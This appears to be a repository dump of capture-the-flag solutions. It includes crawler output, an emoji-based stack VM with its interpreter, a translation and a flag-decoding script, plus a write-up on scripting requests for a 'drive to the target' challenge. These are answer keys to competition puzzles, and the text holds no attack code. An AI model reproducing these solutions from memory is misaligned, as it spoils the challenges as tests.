"full/006ee3c4a70c4b66658e16cf9970fb2accd2d943.jpg", "checksum": "8b168e56c5e0daae14c6df45d6af8c7a"}]}, 72 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-34.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-34.png", "path": "full/2e7bd553d7169e3c5e99bb1b14023da779c37afd.jpg", "checksum": "6dfd617e35381d67f1b515a167a6276b"}]}, 73 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/ebf110c11d160eaaa91d441305ff8874.html", "images": []}, 74 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/8b163f2f9559f60517c09fa6a177da79.html", "images": []}, 75 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/253e66a37fe263f34cfe46d817b3cd16.html", "images": []}, 76 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-50.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-50.png", "path": "full/94fc1e0084ce3836bcb9aaa625ee02142ed17a74.jpg", "checksum": "e89cc47dee6c5fc3de3358f351a10fe2"}]}, 77 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/656eb695e3bb2feab65808d5bec205f2.html", "images": []}, 78 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/27c57d4efda38a82a001127bf3409e45.html", "images": []}, 79 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/968674872368d11d99758f9f4fa33d58.html", "images": []}, 80 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/75f4f167ff1f7420bbc1cd9e3cd582f9.html", "images": []}, 81 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-20.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-20.png", "path": "full/a7ed03a5f862a227aa9d8a231d5e14bc597e8def.jpg", "checksum": "236d0aa6d08e984f81373d69b669333c"}]}, 82 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/cb6a01e6c7b12a34da7e15a1929a759b.html", "images": 
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/scrapy.cfg:
--------------------------------------------------------------------------------
# Automatically created by: scrapy startproject
#
# For more information about the [deploy] section see:
# https://scrapyd.readthedocs.io/en/latest/deploy.html

[settings]
default = ctf_crawl.settings

[deploy]
#url = http://localhost:6800/
project = ctf_crawl

--------------------------------------------------------------------------------
/07-reversing-emoji/extract-palindroms.py:
--------------------------------------------------------------------------------
# primes list downloaded from https://primes.utm.edu/lists/small/millions/

def is_palindrome(s):
    # A string is a palindrome when it reads the same reversed
    return s == s[::-1]

filenames = ['primes1.txt', 'primes2.txt', 'primes3.txt', 'primes4.txt', 'primes5.txt', 'primes6.txt']

palindromes = []
for filename in filenames:
    with open(filename, 'r') as f:
        primes = ['']
        primes.extend(f.read().split())

    # Drop empty tokens, keep the palindromic ones and convert them to int
    p = [int(n) for n in map(str.strip, filter(is_palindrome, filter(None, primes)))]
    palindromes.extend(p)

    print("found {} palindromes".format(len(p)))

# Write all palindromic primes as a single comma-separated line
with open('palindromes', 'w') as f:
    f.write(','.join(map(str, palindromes)))
--------------------------------------------------------------------------------
/07-reversing-emoji/palindromes:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/07-reversing-emoji/palindromes.py:
--------------------------------------------------------------------------------
import sys

# Constants pushed by the three blocks of the emoji program, in print order
first = [106,119,113,119,49,74,172,242,216,208,339,264,344,267,743,660,893,892,1007,975,10319,10550,10503,11342,11504,12533,12741,12833,13437,13926,13893,14450,14832,15417,15505,16094,16285,16599,16758,17488]

second = [93766,93969,94440,94669,94952,94865,95934,96354,96443,96815,97280,97604,97850,98426]

third = [9916239,9918082,9919154,9921394,9923213,9926376,9927388,9931494,9932289,9935427,9938304,9957564,9965794,9978842,9980815,9981858,9989997,100030045,100049982,100059926,100111100,100131019,100160922,100404094,100656111,100707036,100767085,100887990,100998966,101030055,101060206,101141058]


# Palindromic primes written by extract-palindroms.py
with open('palindromes', 'r') as f:
    palindromes = list(map(int, f.read().split(',')))

# XOR each constant with the palindromic prime at the matching index.
# The offsets 0, 98 and 764 are zero-based; the program pushes 1, 99 and 765.
for i in range(len(first)):
    sys.stdout.write(chr(first[i] ^ palindromes[i]))

for i in range(len(second)):
    sys.stdout.write(chr(second[i] ^ palindromes[i + 98]))

for i in range(len(third)):
    sys.stdout.write(chr(third[i] ^ palindromes[i + 764]))
--------------------------------------------------------------------------------
/07-reversing-emoji/program:
--------------------------------------------------------------------------------
🚛 🥇 0️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 7️⃣ 4️⃣ 8️⃣ 8️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 6️⃣ 7️⃣ 5️⃣ 8️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 6️⃣ 5️⃣ 9️⃣ 9️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 6️⃣ 2️⃣ 8️⃣ 5️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 6️⃣ 0️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 5️⃣ 5️⃣ 0️⃣ 5️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 5️⃣ 4️⃣ 1️⃣ 7️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 4️⃣ 8️⃣ 3️⃣ 2️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 4️⃣ 4️⃣ 5️⃣ 0️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 3️⃣ 8️⃣ 9️⃣ 3️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 3️⃣ 9️⃣ 2️⃣ 6️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 3️⃣ 4️⃣ 3️⃣ 7️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 2️⃣ 8️⃣ 3️⃣ 3️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 2️⃣ 7️⃣ 4️⃣ 1️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 2️⃣ 5️⃣ 3️⃣ 3️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 1️⃣ 5️⃣ 0️⃣ 4️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 1️⃣ 3️⃣ 4️⃣ 2️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 5️⃣ 0️⃣ 3️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 5️⃣ 5️⃣ 0️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 3️⃣ 1️⃣ 9️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 7️⃣ 5️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 0️⃣ 7️⃣ ✋ 📥 🥇
🚛 🥇 8️⃣ 9️⃣ 2️⃣ ✋ 📥 🥇
🚛 🥇 8️⃣ 9️⃣ 3️⃣ ✋ 📥 🥇
🚛 🥇 6️⃣ 6️⃣ 0️⃣ ✋ 📥 🥇
🚛 🥇 7️⃣ 4️⃣ 3️⃣ ✋ 📥 🥇
🚛 🥇 2️⃣ 6️⃣ 7️⃣ ✋ 📥 🥇
🚛 🥇 3️⃣ 4️⃣ 4️⃣ ✋ 📥 🥇
🚛 🥇 2️⃣ 6️⃣ 4️⃣ ✋ 📥 🥇
🚛 🥇 3️⃣ 3️⃣ 9️⃣ ✋ 📥 🥇
🚛 🥇 2️⃣ 0️⃣ 8️⃣ ✋ 📥 🥇
🚛 🥇 2️⃣ 1️⃣ 6️⃣ ✋ 📥 🥇
🚛 🥇 2️⃣ 4️⃣ 2️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 7️⃣ 2️⃣ ✋ 📥 🥇
🚛 🥇 7️⃣ 4️⃣ ✋ 📥 🥇
🚛 🥇 4️⃣ 9️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 1️⃣ 9️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 1️⃣ 3️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 1️⃣ 9️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 6️⃣ ✋ 📥 🥇
🚛 🥈 1️⃣ ✋

🖋💠🔶🎌🚩🏁 🍿 🥇 📥 🥈 📥 🥇 🚛 🥇 3️⃣ 8️⃣ 9️⃣ ✋
📥 🥇 📥 🥈
🏀 💰🏁🚩🎌💠🔶
🌓 🎤
🚛 🥇 1️⃣ ✋ 📥 🥇 🍡 🍿 🥈
😄 🏀 💰💠🔶🎌🚩🏁 😐

🚛 🥇 9️⃣ 8️⃣ 4️⃣ 2️⃣ 6️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 7️⃣ 8️⃣ 5️⃣ 0️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 7️⃣ 6️⃣ 0️⃣ 4️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 7️⃣ 2️⃣ 8️⃣ 0️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 6️⃣ 8️⃣ 1️⃣ 5️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 6️⃣ 4️⃣ 4️⃣ 3️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 6️⃣ 3️⃣ 5️⃣ 4️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 5️⃣ 9️⃣ 3️⃣ 4️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 4️⃣ 8️⃣ 6️⃣ 5️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 4️⃣ 9️⃣ 5️⃣ 2️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 4️⃣ 6️⃣ 6️⃣ 9️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 4️⃣ 4️⃣ 4️⃣ 0️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 3️⃣ 9️⃣ 6️⃣ 9️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 3️⃣ 7️⃣ 6️⃣ 6️⃣ ✋ 📥 🥇
🚛 🥈 9️⃣ 9️⃣ ✋

🖋💠🏁🎌🔶🚩 🍿 🥇 📥 🥈 📥 🥇 🚛 🥇 5️⃣ 6️⃣ 8️⃣ ✋
📥 🥇 📥 🥈
🏀 💰🏁🚩🎌💠🔶
🌓 🎤
🚛 🥇 1️⃣ ✋ 📥 🥇 🍡 🍿 🥈
😄 🏀 💰💠🏁🎌🔶🚩 😐

🚛 🥇 1️⃣ 0️⃣ 1️⃣ 1️⃣ 4️⃣ 1️⃣ 0️⃣ 5️⃣ 8️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 1️⃣ 0️⃣ 6️⃣ 0️⃣ 2️⃣ 0️⃣ 6️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 1️⃣ 0️⃣ 3️⃣ 0️⃣ 0️⃣ 5️⃣ 5️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 0️⃣ 9️⃣ 9️⃣ 8️⃣ 9️⃣ 6️⃣ 6️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 0️⃣ 8️⃣ 8️⃣ 7️⃣ 9️⃣ 9️⃣ 0️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 0️⃣ 7️⃣ 6️⃣ 7️⃣ 0️⃣ 8️⃣ 5️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 0️⃣ 7️⃣ 0️⃣ 7️⃣ 0️⃣ 3️⃣ 6️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 0️⃣ 6️⃣ 5️⃣ 6️⃣ 1️⃣ 1️⃣ 1️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 0️⃣ 4️⃣ 0️⃣ 4️⃣ 0️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 0️⃣ 1️⃣ 6️⃣ 0️⃣ 9️⃣ 2️⃣ 2️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 0️⃣ 1️⃣ 3️⃣ 1️⃣ 0️⃣ 1️⃣ 9️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 0️⃣ 1️⃣ 1️⃣ 1️⃣ 1️⃣ 0️⃣ 0️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 0️⃣ 0️⃣ 5️⃣ 9️⃣ 9️⃣ 2️⃣ 6️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 0️⃣ 0️⃣ 4️⃣ 9️⃣ 9️⃣ 8️⃣ 2️⃣ ✋ 📥 🥇
🚛 🥇 1️⃣ 0️⃣ 0️⃣ 0️⃣ 3️⃣ 0️⃣ 0️⃣ 4️⃣ 5️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 9️⃣ 8️⃣ 9️⃣ 9️⃣ 9️⃣ 7️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 9️⃣ 8️⃣ 1️⃣ 8️⃣ 5️⃣ 8️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 9️⃣ 8️⃣ 0️⃣ 8️⃣ 1️⃣ 5️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 9️⃣ 7️⃣ 8️⃣ 8️⃣ 4️⃣ 2️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 9️⃣ 6️⃣ 5️⃣ 7️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 9️⃣ 5️⃣ 7️⃣ 5️⃣ 6️⃣ 4️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 9️⃣ 3️⃣ 8️⃣ 3️⃣ 0️⃣ 4️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 9️⃣ 3️⃣ 5️⃣ 4️⃣ 2️⃣ 7️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 9️⃣ 3️⃣ 2️⃣ 2️⃣ 8️⃣ 9️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 9️⃣ 3️⃣ 1️⃣ 4️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 9️⃣ 2️⃣ 7️⃣ 3️⃣ 8️⃣ 8️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 9️⃣ 2️⃣ 6️⃣ 3️⃣ 7️⃣ 6️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 9️⃣ 2️⃣ 3️⃣ 2️⃣ 1️⃣ 3️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 9️⃣ 2️⃣ 1️⃣ 3️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 9️⃣ 1️⃣ 9️⃣ 1️⃣ 5️⃣ 4️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 9️⃣ 1️⃣ 8️⃣ 0️⃣ 8️⃣ 2️⃣ ✋ 📥 🥇
🚛 🥇 9️⃣ 9️⃣ 1️⃣ 6️⃣ 2️⃣ 3️⃣ 9️⃣ ✋ 📥 🥇
🚛 🥈 7️⃣ 6️⃣ 5️⃣ ✋

🖋🚩💠🎌🔶🏁 🍿 🥇 📥 🥈 📥 🥇 🚛 🥇 1️⃣ 0️⃣ 2️⃣ 3️⃣ ✋
📥 🥇 📥 🥈
🏀 💰🏁🚩🎌💠🔶
🌓 🎤
🚛 🥇 1️⃣ ✋ 📥 🥇 🍡 🍿 🥈
😄 🏀 💰🚩💠🎌🔶🏁 😐
⌛

🖋🏁🚩🎌💠🔶
🚛 🥇 2️⃣ ✋ 📥 🥇 🖋💠🎌🏁🚩🔶
🏀 💰🚩🔶🏁🎌💠
🖋🔶🎌🚩💠🏁 😲 📤 🏀 💰🔶🚩💠🏁🎌 ✋ 😐
📤 🏀 💰🎌🏁💠🔶🚩
🖋🎌🏁🚩🔶💠 😲 📤 🏀 💰🔶🚩💠🏁🎌 😐
📤 🍿 🥇 🚛 🥈 1️⃣ ✋ 📥 🥈 🔪
😲 📤 🍿 🥈 📥 🥇 📥 🥈 ⛰ 😐 📥 🥇
🖋🔶🚩💠🏁🎌 🚛 🥈 1️⃣ ✋ 📥 🥈 🍡 🏀 💰💠🎌🏁🚩🔶

🖋🚩🔶🏁🎌💠
🤡 🚛 🥇 2️⃣ ✋ 📥 🥇
🖋🎌🚩💠🔶🏁 🔪 😲 📤 🚛 🥇 1️⃣ ✋ 📥 🥇
🏀 💰🔶🎌🚩💠🏁 😐
📤 🤡 📥 🥇
📬 😲 🏀 💰🔶🎌🚩💠🏁 😐
📤 🤡 📥 🥇 🚛 🥇 1️⃣ ✋
📥 🥇 🍡 🤡 🍿 🥇 🏀 💰🎌🚩💠🔶🏁

🖋🎌🏁💠🔶🚩
🤡 🤡 🚛 🥈 0️⃣ ✋ 📥 🥈
🖋🏁💠🔶🚩🎌 🚛 🥇 1️⃣ 0️⃣ ✋ 📥 🥇
⭐ 🍿 🥈 📥 🥇 📬
📥 🥈 🍡 🍿 🥈 🍿 🥇 🤡 📥 🥈 🔪
😲 📤 🚛 🥈 1️⃣ ✋ 📥 🥈 🏀 💰🎌🏁🚩🔶💠 😐
📤 📥 🥇 🚛 🥇 1️⃣ 0️⃣ ✋ 📥 🥇 📐
😲 🏀 💰🎌🏁🚩🔶💠 😐
🤡 📥 🥈 🏀 💰🏁💠🔶🚩🎌

--------------------------------------------------------------------------------
/07-reversing-emoji/translated:
--------------------------------------------------------------------------------
push 0
push 17488
push 16758
push 16599
push 16285
push 16094
push 15505
push 15417
push 14832
push 14450
push 13893
push 13926
push 13437
push 12833
push 12741
push 12533
push 11504
push 11342
push 10503
push 10550
push 10319
push 975
push 1007
push 892
push 893
push 660
push 743
push 267
push 344
push 264
push 339
push 208
push 216
push 242
push 172
push 74
push 49
push 119
push 113
push 119
push 106
pop acc1
push 1
push 106
push 389
push 1
jump_to
xor
print_top
push 1
add
pop acc2
if_not_zero
jump_to
push 98426
push 97850
push 97604
push 97280
push 96815
push 96443
push 96354
push 95934
push 94865
push 94952
push 94669
push 94440
push 93969
push 93766
pop acc1
push 99
push 93766
push 568
push 99
jump_to
xor
print_top
push 1
add
pop acc2
if_not_zero
jump_to
push 101141058
push 101060206
push 101030055
push 100998966
push 100887990
push 100767085
push 100707036
push 100656111
push 100404094
push 100160922
push 100131019
push 100111100
push 100059926
push 100049982
push 100030045
push 9989997
push 9981858
push 9980815
push 9978842
push 9965794
push 9957564
push 9938304
push 9935427
push 9932289
push 9931494
push 9927388
push 9926376
push 9923213
push 9921394
push 9919154
push 9918082
push 9916239
pop acc1
push 765
push 9916239
push 1023
push 765
jump_to
xor
print_top
push 1
add
pop acc2
if_not_zero
jump_to
exit
push 2
jump_to
if_zero
pop_out
jump_to
pop_out
jump_to
if_zero
pop_out
jump_to
pop_out
pop acc1
push 1
sub
if_zero
pop_out
pop acc2
push 2
push 1
jump_top
push 2
push 1
add
jump_to
clone
push 2
sub
if_zero
pop_out
push 1
jump_to
pop_out
clone
push 1
modulo
if_zero
jump_to
pop_out
clone
push 1
push 1
add
clone
pop acc1
jump_to
clone
clone
push 0
push 10
multiply
pop acc2
push 10
modulo
push 10
add
pop acc2
pop acc1
clone
push 10
sub
if_zero
pop_out
push 1
jump_to
pop_out
push 10
push 10
divide
if_zero
jump_to
clone
push 1
jump_to

--------------------------------------------------------------------------------
/07-reversing-emoji/vm.modified.py:
--------------------------------------------------------------------------------
import sys

# Implements a simple stack-based VM
class VM:

    def __init__(self, rom):
        self.rom = rom
        self.accumulator1 = 0
        self.accumulator2 = 0
        self.instruction_pointer = 1
        self.stack = []

    def step(self):
        cur_ins = self.rom[self.instruction_pointer]
        self.instruction_pointer += 1

        fn = VM.OPERATIONS.get(cur_ins, None)

        if cur_ins[0] == '🖋':
            return
        if fn is None:
            raise RuntimeError("Unknown instruction '{}' at {}".format(
                repr(cur_ins), self.instruction_pointer - 1))
        else:
            fn(self)

    def add(self):
        self.stack.append(self.stack.pop() + self.stack.pop())

    def sub(self):
        a = self.stack.pop()
        b = self.stack.pop()
        self.stack.append(b - a)

    def if_zero(self):
        if self.stack[-1] == 0:
            while self.rom[self.instruction_pointer] != '😐':
                if self.rom[self.instruction_pointer] in ['🏀', '⛰']:
                    break
                self.step()
        else:
            self.find_first_endif()
            self.instruction_pointer += 1

    def if_not_zero(self):
        if self.stack[-1] != 0:
            while self.rom[self.instruction_pointer] != '😐':
                if self.rom[self.instruction_pointer] in ['🏀', '⛰']:
                    break
                self.step()
        else:
            self.find_first_endif()
            self.instruction_pointer += 1

    def find_first_endif(self):
        while self.rom[self.instruction_pointer] != '😐':
            self.instruction_pointer += 1

    def jump_to(self):
        marker = self.rom[self.instruction_pointer]
        if marker[0] != '💰':
            print('Incorrect symbol : ' + marker[0])
            raise SystemExit()
        marker = '🖋' + marker[1:]
        self.instruction_pointer = self.rom.index(marker) + 1

    def jump_top(self):
        self.instruction_pointer = self.stack.pop()

    def exit(self):
        print('\nDone.')
        raise SystemExit()

    def print_top(self):
        sys.stdout.write(chr(self.stack.pop()))
        sys.stdout.flush()

    def push(self):
        if self.rom[self.instruction_pointer] == '🥇':
            self.stack.append(self.accumulator1)
        elif self.rom[self.instruction_pointer] == '🥈':
            self.stack.append(self.accumulator2)
        else:
            raise RuntimeError('Unknown instruction {} at position {}'.format(
                self.rom[self.instruction_pointer], str(self.instruction_pointer)))
        self.instruction_pointer += 1

    def pop(self):
        if self.rom[self.instruction_pointer] == '🥇':
            self.accumulator1 = self.stack.pop()
        elif self.rom[self.instruction_pointer] == '🥈':
            self.accumulator2 = self.stack.pop()
        else:
            raise RuntimeError('Unknown instruction {} at position {}'.format(
                self.rom[self.instruction_pointer], str(self.instruction_pointer)))
        self.instruction_pointer += 1

    def pop_out(self):
        self.stack.pop()

    def load(self):
        num = 0

        if self.rom[self.instruction_pointer] == '🥇':
            acc = 1
        elif self.rom[self.instruction_pointer] == '🥈':
            acc = 2
        else:
            raise RuntimeError('Unknown instruction {} at position {}'.format(
                self.rom[self.instruction_pointer], str(self.instruction_pointer)))
        self.instruction_pointer += 1

        while self.rom[self.instruction_pointer] != '✋':
            num = num * 10 + (ord(self.rom[self.instruction_pointer][0]) - ord('0'))
            self.instruction_pointer += 1

        if acc == 1:
            self.accumulator1 = num
        else:
            self.accumulator2 = num

        self.instruction_pointer += 1

    def clone(self):
        self.stack.append(self.stack[-1])

    def multiply(self):
        a = self.stack.pop()
        b = self.stack.pop()
        self.stack.append(b * a)

    def divide(self):
        a = self.stack.pop()
        b = self.stack.pop()
        self.stack.append(b // a)

    def modulo(self):
        a = self.stack.pop()
        b = self.stack.pop()
        self.stack.append(b % a)

    def xor(self):
        a = self.stack.pop()
        b = self.stack.pop()
        print("{} ^ {}\n".format(b, a))
        self.stack.append(b ^ a)

    OPERATIONS = {
        '🍡': add,
        '🤡': clone,
        '📐': divide,
        '😲': if_zero,
        '😄': if_not_zero,
        '🏀': jump_to,
        '🚛': load,
        '📬': modulo,
        '⭐': multiply,
        '🍿': pop,
        '📤': pop_out,
        '🎤': print_top,
        '📥': push,
        '🔪': sub,
        '🌓': xor,
        '⛰': jump_top,
        '⌛': exit
    }


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print('Missing program')
        raise SystemExit()

    with open(sys.argv[1], 'r') as f:
        print('Running ....')
        all_ins = ['']
        all_ins.extend(f.read().split())
        vm = VM(all_ins)

        while 1:
            vm.step()
--------------------------------------------------------------------------------
/07-reversing-emoji/vm.py:
--------------------------------------------------------------------------------
import sys

# Implements a simple stack-based VM
class VM:

    def __init__(self, rom):
        self.rom = rom
        self.accumulator1 = 0
        self.accumulator2 = 0
        self.instruction_pointer = 1
        self.stack = []

    def step(self):
        cur_ins = self.rom[self.instruction_pointer]
        self.instruction_pointer += 1

        fn = VM.OPERATIONS.get(cur_ins, None)

        if cur_ins[0] == '🖋':
            return
        if fn is None:
            raise RuntimeError("Unknown instruction '{}' at {}".format(
                repr(cur_ins), self.instruction_pointer - 1))
        else:
            fn(self)

    def add(self):
        self.stack.append(self.stack.pop() + self.stack.pop())

    def sub(self):
        a = self.stack.pop()
        b = self.stack.pop()
        self.stack.append(b - a)

    def if_zero(self):
        if self.stack[-1] == 0:
            while self.rom[self.instruction_pointer] != '😐':
                if self.rom[self.instruction_pointer] in ['🏀', '⛰']:
                    break
                self.step()
        else:
            self.find_first_endif()
            self.instruction_pointer += 1

    def if_not_zero(self):
        if self.stack[-1] != 0:
            while self.rom[self.instruction_pointer] != '😐':
                if self.rom[self.instruction_pointer] in ['🏀', '⛰']:
                    break
                self.step()
        else:
            self.find_first_endif()
            self.instruction_pointer += 1

    def find_first_endif(self):
        while self.rom[self.instruction_pointer] != '😐':
            self.instruction_pointer += 1

    def jump_to(self):
        marker = self.rom[self.instruction_pointer]
        if marker[0] != '💰':
            print('Incorrect symbol : ' + marker[0])
            raise SystemExit()
        marker = '🖋' + marker[1:]
        self.instruction_pointer = self.rom.index(marker) + 1

    def jump_top(self):
        self.instruction_pointer = self.stack.pop()

    def exit(self):
        print('\nDone.')
        raise SystemExit()

    def print_top(self):
        sys.stdout.write(chr(self.stack.pop()))
        sys.stdout.flush()

    def push(self):
        if self.rom[self.instruction_pointer] == '🥇':
            self.stack.append(self.accumulator1)
        elif self.rom[self.instruction_pointer] == '🥈':
            self.stack.append(self.accumulator2)
        else:
            raise RuntimeError('Unknown instruction {} at position {}'.format(
                self.rom[self.instruction_pointer], str(self.instruction_pointer)))
        self.instruction_pointer += 1

    def pop(self):
        if self.rom[self.instruction_pointer] == '🥇':
            self.accumulator1 = self.stack.pop()
        elif self.rom[self.instruction_pointer] == '🥈':
            self.accumulator2 = self.stack.pop()
        else:
            raise RuntimeError('Unknown instruction {} at position {}'.format(
                self.rom[self.instruction_pointer], str(self.instruction_pointer)))
        self.instruction_pointer += 1

    def pop_out(self):
        self.stack.pop()

    def load(self):
        num = 0

        if self.rom[self.instruction_pointer] == '🥇':
            acc = 1
        elif self.rom[self.instruction_pointer] == '🥈':
            acc = 2
        else:
            raise RuntimeError('Unknown instruction {} at position {}'.format(
                self.rom[self.instruction_pointer], str(self.instruction_pointer)))
        self.instruction_pointer += 1

        while self.rom[self.instruction_pointer] != '✋':
            num = num * 10 + (ord(self.rom[self.instruction_pointer][0]) - ord('0'))
            self.instruction_pointer += 1

        if acc == 1:
            self.accumulator1 = num
        else:
            self.accumulator2 = num

        self.instruction_pointer += 1

    def clone(self):
        self.stack.append(self.stack[-1])

    def multiply(self):
        a = self.stack.pop()
        b = self.stack.pop()
        self.stack.append(b * a)

    def divide(self):
        a = self.stack.pop()
        b = self.stack.pop()
        self.stack.append(b // a)

    def modulo(self):
        a = self.stack.pop()
        b = self.stack.pop()
        self.stack.append(b % a)

    def xor(self):
        a = self.stack.pop()
        b = self.stack.pop()
        self.stack.append(b ^ a)

    OPERATIONS = {
        '🍡': add,
        '🤡': clone,
        '📐': divide,
        '😲': if_zero,
        '😄': if_not_zero,
        '🏀': jump_to,
        '🚛': load,
        '📬': modulo,
        '⭐': multiply,
        '🍿': pop,
        '📤': pop_out,
        '🎤': print_top,
        '📥': push,
        '🔪': sub,
        '🌓': xor,
        '⛰': jump_top,
        '⌛': exit
    }


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print('Missing program')
        raise SystemExit()

    with open(sys.argv[1], 'r') as f:
        print('Running ....')
        all_ins = ['']
        all_ins.extend(f.read().split())
        vm = VM(all_ins)

        while 1:
            vm.step()
--------------------------------------------------------------------------------
/08-misc-drive-to-target/README.md:
--------------------------------------------------------------------------------
# Description
## Drive to the target
Label: coding

Excellent work! With your fine sleuthing skills, you managed to find a picture of the handsome creature with its pet biped. At last friends and companionship may be near!

Like all inhabitants of this world, you spend an inordinate amount of time on the site, stalking and comparing your life to that of others. The first thought that springs to your mind is "Why haven't I ever been to Mauritius on holiday?" followed swiftly by "What is a Mauritius anyway?" But after a while and with language successfully deciphered, you've made contact with the lifeform in the picture, you have a "date"? You're given the address of where to meet your potential interest. "1 Banana way, beware of the glass." An odd address, especially that last part. So how do you get there? You land your ship and begin to search.

# Solution
This task is a link to the site `https://drivetothetarget.web.ctfcompetition.com`. The site contains two inputs for latitude and longitude. Choosing values will tell you your speed and show text saying whether you are getting closer or further away. It seems that the goal is to find the correct location, but you can only move a bit at a time. Playing with the numbers, decrementing lat and lon gives us the message that we are getting closer. Some other important facts: when the message says that you traveled too fast, if you retry the same value, eventually it will work. Next, a new token is given in a hidden input field. With these facts, we can write a script that continuously decrements the lat and lon, and retries if it fails. It also appears that the token identifies your location, which is how it calculates the distance you can travel.

The script `drive.py` continuously decrements `lon` until the message says that we are moving away. Then it switches to decrementing `lat`. Something important that I didn't add is a check for the text `CTF` in case we find it, as I was mostly monitoring it. I found that the default increment of `0.0001` worked well. This is marked as a 'coding' task but I'm not sure if just spamming a ton of calls is the right way to approach this. Maybe there is a way to calculate the token. It would also be better optimized if both lat and lon were decremented, but I didn't know if that would work in case you had to decrement one more than the other.

